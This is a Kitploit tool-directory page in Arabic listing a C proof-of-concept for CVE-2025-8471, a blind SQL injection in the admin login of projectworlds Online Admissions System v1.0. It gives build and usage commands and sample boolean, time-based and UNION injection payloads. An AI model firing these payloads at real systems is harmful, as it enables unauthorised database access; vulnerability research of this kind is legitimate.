Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-8471 — استغلال SQL injection في projectworlds Online Admissions System v1.0 | Kitploit
أدوات/GitHubGitHub/bytereaper77/cve-2025-8471
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقArchived
GitHubbytereaper77/cve-2025-8471

CVE-2025-8471

استغلال SQL injection في projectworlds Online Admissions System v1.0

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-8471 إثبات المفهوم لحقن SQL

المؤلف: Byte Reaper
CVE: CVE-2025-8471
الثغرة: حقن SQL في “projectworlds Online Admission System v1.0”
الوصف:
يوجد حقن SQL أعمى في adminlogin.php?a_id=. يقوم هذا البرهان (PoC) بإرسال سلسلة من طلبات GET مع حمولات متنوعة - سواء كانت ذات مرحلتين (INSERT … UNION SELECT …, SLEEP(), SELECT code …) أو سلاسل "حقن عميق" - لاكتشاف وتعداد المشكلة من خلال فروق طول الاستجابة.


المتطلبات

  • GCC (أو أي مترجم C)
  • رؤوس تطوير libcurl
  • argparse.h && argparse.c
  • نظام متوافق مع POSIX (لينكس، ماك)

التثبيت

  1. تأكد من تثبيت libcurl و argparse (مثال على دبيان/أوبونتو: sudo apt-get install libcurl4-openssl-dev).

  2. التجميع:

    root@kitploit:~
    gcc exploit.c argparse.c -o exploit -lcurl
    
    ./exploit -u <TARGET_BASE_URL> [-c cookies.txt] [-v]
    
    -u, --url — Base URL of the target, e.g. http://vulnsite.com
    
    -c, --cookies — (Optional) path to a cookies file to maintain session
    
    -v, --verbose — Enable verbose libcurl output and full response dumps
    

مثال:

./exploit -u http:// -v

سيقوم هذا بـ:

إرسال طلب عادي إلى /adminlogin.php وتسجيل طوله.

التكرار على قوائم الحمولات ذات المرحلتين والعميقة، وحقن كل واحدة في ?a_id=….

مقارنة طول استجابة كل حقنة مقابل خط الأساس.

تسجيل كل حمولة، وحالة HTTP (إذا كانت ≥2xx)، والطول الملاحظ في result.log.

الحمولات المختبرة: مرحلتين

INSERT INTO stages (id,code) VALUES (3, 'UNION SELECT NULL --');

SELECT SLEEP(2);

SELECT code FROM stages WHERE id = 3;

الحقن العميق

'//OR//1=1--, '//OR//'a'='a'--, …

تشمل حقنًا منطقيًا، زمانيًا، اتحادًا، سلسلة فرعية، ترتيبًا، مشابهًا، وجوديًا، وحقن بأسلوب التعليقات.

جميع الحمولات مرمزة بعنوان URL عبر curl_easy_escape قبل الإرسال.

المراجع:

  • NVD : https://nvd.nist.gov/vuln/detail/CVE-2025-8471
  • CVE : https://www.cve.org/CVERecord?id=CVE-2025-8471

الترخيص:

MIT License

تنزيل الأداة